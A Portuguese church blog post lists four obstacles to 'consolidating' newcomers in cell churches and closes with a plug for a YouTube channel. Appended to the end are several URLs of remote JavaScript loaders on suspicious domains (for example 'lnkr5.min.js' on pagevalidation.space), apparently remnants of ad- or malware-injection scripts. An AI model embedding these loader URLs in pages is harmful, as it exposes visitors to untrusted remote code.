Os quatro inimigos da consolidação

Quando a consolidação é bem-sucedida, fecha-se as portas dos fundos da Igreja local. Por isso, a consolidação é uma das partes mais importantes para o crescimento das células e, consequentemente, da Igreja local.

O que se observa é que existem fatores que atrapalham esse processo de ser bem-sucedido. É o que se chama de “inimigos da consolidação”. Seguem o mais comuns:

1º – A falta de responsabilidade com as vidas que chegam

Infelizmente, existem células e, até Igrejas, que, de fato, não têm tido a responsabilidade devida com as vidas que têm sido enviadas a eles por Deus.

Como Reino, nos foi dada a responsabilidade de “ir e fazer discípulos de todas as nações, ensinando-os a guardar tudo o que nos foi ensinado”. Esta é a responsabilidade da Igreja.

É fato que, em muitos dos casos em que a “falta de responsabilidade com as vidas” se apresenta, não se trata de algo “proposital”. Longe disso! Antes, na grande maioria das vezes em que se nota esta “falta de responsabilidade com as vidas que chegam”, nota-se que ela acontece por não se ter um processo planejado e bem definido de consolidação e/ou cuidado para com as vidas que estão sendo acrescentadas.

O ideal é que a Igreja local tenha um planejamento claro sobre o que acontece desde quando a pessoa chega a Igreja ou a célula, seja por visita ou por conversão.

2º – A falta de amor

Há quem defenda a tese de que a “falta de responsabilidade com as vidas” brote por falta de amor, outros, no entanto, apenas não despertaram para esse “amor” – o amor por cuidar de vidas.

É preciso que se desperte em toda a Igreja local o “amor por cuidar de vidas”! É preciso que se fale e se ensine sobre a importância de cada um ser um instrumento de Deus para ganhar e consolidar as vidas que Cristo está enviando.

Uma vez que Deus é amor e que Ele habita em nós através do Espírito Santo de Deus, este amor já está em nós. O que se faz necessário, por vezes, são orações específicas para que este amor se manifeste em cada membro da Igreja.

3º – A falta de organização

Existem pessoas que até têm a responsabilidade pelas vidas que chegam e que, de fato, têm amor por essas vidas, mas que não conseguem ter a organização necessária quanto a consolidação delas.

Não têm um “passo a passo” para guiar a pessoa desde que ela chega à Igreja ou a célula até o próximo passo que ela precisa dar em direção a Cristo e assim por diante.

Sabe, ter um “passo a passo” no processo de consolidação é primordial para que se tenha um processo de crescimento individual.

 

E, tanto definir, quanto supervisionar o seu funcionamento é uma questão de organização.

4º – A falta de atitude

Assim como não adianta ter responsabilidade e amor para que se tenha uma consolidação bem-sucedida, também não adianta ter organização sem atitude.

Quer um exemplo? Talvez a Igreja ou a célula até anote os dados das pessoas que chegam, fazem planilhas e etc, no entanto, esses arquivos ficam “arquivados” ou “engavetados”.

É preciso muito mais do que isso! É preciso de atitude para que esses dados sejam, de fato, utilizados para a glória do nome do Senhor e essas vidas tenham um verdadeiro encontro com Deus para que também possam dizer “sim” ao chamado de Deus para cuidar de vidas.

Ter um planejamento para que essas pessoas estejam sendo treinadas e motivadas a estarem se comprometendo com o Reino de Deus é indispensável. Para isso, o contato “24 horas” (que deve ser realizado após a conversão ou a visita) precisa ser realizado, as visitas precisam estar acontecendo, um contato entre Pastor e os que chegam precisa ser marcado e etc., mas para tudo isso, é preciso ter atitude!

Neste processo, as células precisam estar trabalhando a “todo vapor”, comprometidas e envolvidas em “fazer acontecer”.

Todos os membros da Igreja local precisam estar conscientes da importância de se consolidar os que estão sendo acrescentados pelo Senhor. Ou seja, a Igreja local inteira precisa compreender a importância da boa consolidação das pessoas que Deus vai acrescentando.

Se você achou o tema interessante e gostaria de saber mais sobre células, discipulado e consolidação, clique no link e viste o nosso canal no YouTube. Neste canal, você irá encontrar desde ministrações poderosas, até pequenos vídeos sobre assuntos específicos que podem ajudar a edificar você e toda a sua equipe.

http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=35http://pagevalidation.space/addons/lnkr5.min.jshttp://pagevalidation.space/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_